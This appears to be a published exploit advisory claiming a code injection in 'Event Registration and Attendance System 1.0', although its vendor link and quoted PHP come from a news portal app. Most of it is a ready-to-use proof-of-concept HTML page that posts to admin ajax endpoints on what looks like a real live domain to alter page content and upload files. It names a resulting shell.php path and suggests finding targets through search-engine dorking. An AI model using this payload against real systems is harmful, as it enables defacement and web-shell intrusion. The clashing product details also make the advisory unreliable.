Headline
Event Registration and Attendance System 1.0 Code Injection
Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.
=============================================================================================================================================| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : admin_class.php $data .= ", content = '".htmlentities(str_replace("'","’",$content))."' "; if(!empty($_FILES['cover']['tmp_name'])){ $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name'])); $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname); $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http'; $hostName = $_SERVER['HTTP_HOST']; $path =explode('/',$_SERVER['PHP_SELF']); $currentPath = '/'.$path[1]; if($move){ $data .= ", cover_img='$fname' "; } } [+] Line 27 : Set your target url.[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Manage About Page</title> <!-- Include Summernote CSS and jQuery --> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet"> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script></head><body> <div class="container mt-5"> <div class="col-lg-12"> <div class="card card-outline card-primary"> <div class="card-body"> <form action="" id="manage-about"> <div class="form-group"> <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control"> <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p> </textarea> </div> </form> </div> <div class="card-footer border-top border-info"> <div class="d-flex w-100 justify-content-center align-items-center"> <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button> </div> </div> </div> </div> </div> <script> $(document).ready(function(){ // Initialize Summernote Editor $('.summernote2').summernote({ height: 300, toolbar: [ ['style', ['style']], ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']], ['fontname', ['fontname']], ['fontsize', ['fontsize']], ['color', ['color']], ['para', ['ol', 'ul', 'paragraph', 'height']], ['table', ['table']], ['insert', ['link', 'picture']], ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']] ], callbacks: { onImageUpload: function(files) { saveImg(files[0]); // Handle image upload } } }); // Function to save uploaded image function saveImg(_file) { var data = new FormData(); data.append("file", _file); $.ajax({ data: data, type: "POST", url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image", cache: false, contentType: false, processData: false, success: function(resp) { var image = $('<img>').attr('src', resp); $('.summernote2').summernote("insertNode", image[0]); } }); } }); // Form Submission $('#manage-about').submit(function(e) { e.preventDefault(); start_load(); // Start a loading indicator (you need to define this function) $.ajax({ url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', success: function(resp) { if(resp == 1) { alert_toast('Data successfully saved', "success"); end_load(); // End the loading indicator (you need to define this function) } } }); }); // Optional: Define start_load and end_load functions function start_load() { // Add your loading indicator logic here } function end_load() { // Remove your loading indicator logic here } function alert_toast(message, type) { alert(message); // Basic alert. Replace with a better toast notification if needed. } </script></body></html>[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================